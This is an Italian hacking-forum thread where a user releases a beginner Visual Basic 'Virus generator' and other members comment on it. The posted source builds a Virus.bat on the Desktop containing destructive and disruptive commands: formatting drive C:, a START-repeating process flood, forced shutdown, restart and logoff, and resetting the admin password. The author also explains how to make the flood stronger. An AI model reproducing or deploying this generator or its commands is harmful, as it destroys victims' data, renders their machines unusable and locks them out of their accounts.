• Regolamento Macrocategoria DEV
    Prima di aprire un topic nella Macrocategoria DEV, è bene leggerne il suo regolamento. Sei un'azienda o un hosting/provider? Qui sono anche contenute informazioni per collaborare con Sciax2 ed ottenere l'accredito nella nostra community!

Release Generator Batch v1.0

Riferimento: Generator Batch v1.0



Il generatore non e' molto positivo, la grafica non mi piace molto, mentre le i codici che si possono generare sono pochi.

Ti consiglio di migliorare la grafica, e di inserire più opzioni di scelta :emoji_slight_smile:

Voto 6/10
 
Riferimento: Generator Batch v1.0



Il generatore non e' molto positivo, la grafica non mi piace molto, mentre le i codici che si possono generare sono pochi.

Ti consiglio di migliorare la grafica, e di inserire più opzioni di scelta :emoji_slight_smile:

Voto 6/10

Non funge quel Download, scusate dovrete aspettare che modifico non lo posto subito perchè ho aggiustato ma non lo posto voglio aggiungere qualcosa ( L'Impalla PC modificato funge ho aperto 2000 processi, il brutto e che lo generi devi cliccare modifica e aggiungere "START" Con : Ctrl + v è facile bastano 10 secondi, spiegherò quando riposto download nel topic). Mi consigli dei comandi?!
 
Riferimento: Generator Batch v1.0

Questo programma è una pallata Totale :fighetto:
un file .bat non POTRA' MAI ma dico MAI eliminare i file di Windows e del Sistema. :leggi:
 
Riferimento: Generator Batch v1.0

Questo programma è una pallata Totale :fighetto:
un file .bat non POTRA' MAI ma dico MAI eliminare i file di Windows e del Sistema. :leggi:
Sei stupido o cosa? Se avresti letto i commenti senza sparare a 0 avresti capito che è un'allenamento e io il codice batch l'ho trovato sul Forum è l'ho inserito nel generator pur sapendo che non avrebbe eliminato tutto. PS : Quando ho tempo metto download funzionante ^^
 
Riferimento: Generator Batch v1.0

Sei stupido o cosa? Se avresti letto i commenti senza sparare a 0 avresti capito che è un'allenamento e io il codice batch l'ho trovato sul Forum è l'ho inserito nel generator pur sapendo che non avrebbe eliminato tutto. PS : Quando ho tempo metto download funzionante ^^

1° Grassetto: Non è stupido, anzi è intelligente.
2° Grassetto: senza criticare il tuo "progetto", potevi almeno creare qualcosa di utile per gli utenti dello Sciax2 Forum, non dico qualcosa di complesso, almeno qualcosa di utile e non-complesso. :S Se sai che i generatori Batch non funzionano neanche: "formatta pc", "impalla pc", e molte altre checkbox di questo tipo, perché pubblichi? ...
3° Grassetto: puoi anche non mettere niente, lol. Poi fai quel che vuoi, nessuno ti mette i bastoni fra le ruote. Ognuno è libero di fare ciò che si vuole. La vita è fatta per imparare e sbagliare, c'è chi sbaglia e c'è chi impara, tu stai "imparando" a fare questi programmi anche se inutili per gli utenti ma per allenamento, io sto dando un mio parere anche sbagliato perché sto pseudo-criticando te e il tuo progetto.
Comunque volevo anche dirti bravo per il progetto anche se facile, almeno è un allenamento. ;) Complimenti anche se hai fatto un copia & incolla. Volevo dirti che per la prossima release fare di più e di "complesso" (non tanto complesso) e di imparare il Visual C#/C++ o il sicuramente il C in generale perché è un ottimo linguaggio di programmazione anche se il più difficile da studiare e il più potente tra il Basic e altri linguaggi di programmazione. ;)
 
Riferimento: Generator Batch v1.0

1° Grassetto: Non è stupido, anzi è intelligente.
2° Grassetto: senza criticare il tuo "progetto", potevi almeno creare qualcosa di utile per gli utenti dello Sciax2 Forum, non dico qualcosa di complesso, almeno qualcosa di utile e non-complesso. :S Se sai che i generatori Batch non funzionano neanche: "formatta pc", "impalla pc", e molte altre checkbox di questo tipo, perché pubblichi? ...
3° Grassetto: puoi anche non mettere niente, lol. Poi fai quel che vuoi, nessuno ti mette i bastoni fra le ruote. Ognuno è libero di fare ciò che si vuole. La vita è fatta per imparare e sbagliare, c'è chi sbaglia e c'è chi impara, tu stai "imparando" a fare questi programmi anche se inutili per gli utenti ma per allenamento, io sto dando un mio parere anche sbagliato perché sto pseudo-criticando te e il tuo progetto.
Comunque volevo anche dirti bravo per il progetto anche se facile, almeno è un allenamento. ;) Complimenti anche se hai fatto un copia & incolla. Volevo dirti che per la prossima release fare di più e di "complesso" (non tanto complesso) e di imparare il Visual C#/C++ o il sicuramente il C in generale perché è un ottimo linguaggio di programmazione anche se il più difficile da studiare e il più potente tra il Basic e altri linguaggi di programmazione. ;)

Scusa per la presunzione ho aggiustato adesso il programma funge alla perfezione anche la source.
 
Riferimento: Generator Batch v1.0

Salve sciaxini, ieri mi sono messo in testa di fare un generatore di codici batch.
Questo è il mio primo programma in Visual basic 2010.


Commenti:
Il programma per alcuni è inutile.
Grafica è stata fatta abbastanza bene, si poteva far di meglio.
Ripeto è il mio primo programma quindi anche se per molti di voi è facile farlo per me non lo è stato da ieri sera che ci lavoro.
Accetto qualsisasi tipo di commento apparte insulti inutili, SOLO critiche costruttive.

Screen:
0261a-b4a2aa39-7586-4ba8-b76c-2d0a8574ecc4.png


Scansione:
Perfavore, Entra oppure Registrati per vedere i Link!

Vengono rilevati 5/42 virus, credo che il motivo sia che il generator produce file maligni, ma premetto che non è un trojan, rat, o roba simile.

Download:
Perfavore, Entra oppure Registrati per vedere i Link!



Sotto richiesta ecco la Source:
Imports System.IO.File

Public Class Form2


Dim scrivi As System.IO.StreamWriter




Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
If CheckBox1.Checked = True Then
TextBox1.Text = TextBox1.Text + "format C: /autotest /q /u" + vbCrLf
MsgBox("Hai selezionato formatta PC", MsgBoxStyle.Information, "Virus generator")
End If
If CheckBox2.Checked = True Then
TextBox1.Text = TextBox1.Text + "START" + vbCrLf + "START" + vbCrLf + "START" + vbCrLf + "START"
MsgBox("Hai selezionato impalla PC [Clicca tasto destro sul Virus->Modifica->Aggiungi altri Start per renderlo più potente!", MsgBoxStyle.Information, "Virus generator")


End If
If CheckBox3.Checked = True Then
TextBox1.Text = TextBox1.Text + "shutdown -s -f" + vbCrLf
MsgBox("Hai selezionato spegni PC", MsgBoxStyle.Information, "Virus generator")
End If
If CheckBox4.Checked = True Then
TextBox1.Text = TextBox1.Text + "shutdown -r -f" + vbCrLf
MsgBox("Hai selezionato Riavvia PC", MsgBoxStyle.Information, "Virus generator")
End If
If CheckBox5.Checked = True Then
TextBox1.Text = TextBox1.Text + "shutdown -l -f" + vbCrLf
MsgBox("Hai selezionato disconnetti utente PC", MsgBoxStyle.Information, "Virus generator")
End If
If CheckBox6.Checked = True Then
TextBox1.Text = TextBox1.Text + "DISATTIVA FIREWALL" + vbCrLf
MsgBox("Hai selezionato DISATTIVA FIREWALL", MsgBoxStyle.Information, "Virus generator")
End If
If CheckBox7.Checked = True Then
TextBox1.Text = TextBox1.Text + "@net user admin 123123" + vbCrLf
MsgBox("Hai selezionato cambia password Utente PC in : 123123", MsgBoxStyle.Information, "Virus generator")
End If
If MsgBox("Il Virus è stato generato con successo! Controlla nel tuo DeskTop!", MsgBoxStyle.Information, "Virus generator") Then


End If


scrivi = System.IO.File.AppendText(Environment.GetFolderPath(Environment.SpecialFolder.Desktop) & "\Virus.bat")
scrivi.WriteLine(TextBox1.Text)
scrivi.Close()
TextBox1.Text = ""
TextBox1.Text = ""
End Sub


Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
MsgBox("Hai appena aperto il Virus generator, ricorda di non usare più effetti o il virus non funzionerà! PS : NON mi assumo nessuna responsabilità dell'uso che ne farai, se accetti queste condizioni clicca si.", MsgBoxStyle.YesNo, "Virus generator")
End Sub


Private Sub CheckBox7_CheckedChanged(ByVal sender As System.Object, ByVal e As System.EventArgs)


End Sub
End Class



CREATO DA : ME
Fatemi sapere cosa ne pensate !


Scusate per il per il periodo di tempo con link non funzionante, ora potete scaricare il generatore e usarlo (tutti i comandi fungono adesso, anche la source è funzionante PS: Lo screen non è aggiornato ho aggiunto un nuovo comando.Scusate per la presunzione (per alcuni autori dei commenti)nell'impalla pc dopo che lo generate cliccate tasto destro su di esso>Modifica e aggiungete più "START" a capo ancora "START" più volte scriverete "START" ecc... Più il computer si impallerà, l'ho provato sul mio pc chiudendo tutto e aprendo solo questo file mi si sono aperti 2000 processi. P.S.S : Se non riuscite a più a chiudere i CMD che si apriranno disconnettete utente).







Se lo sai anche tu che potevi migliorare la Grafica allora perche' non lo hai fatto? :emoji_confused: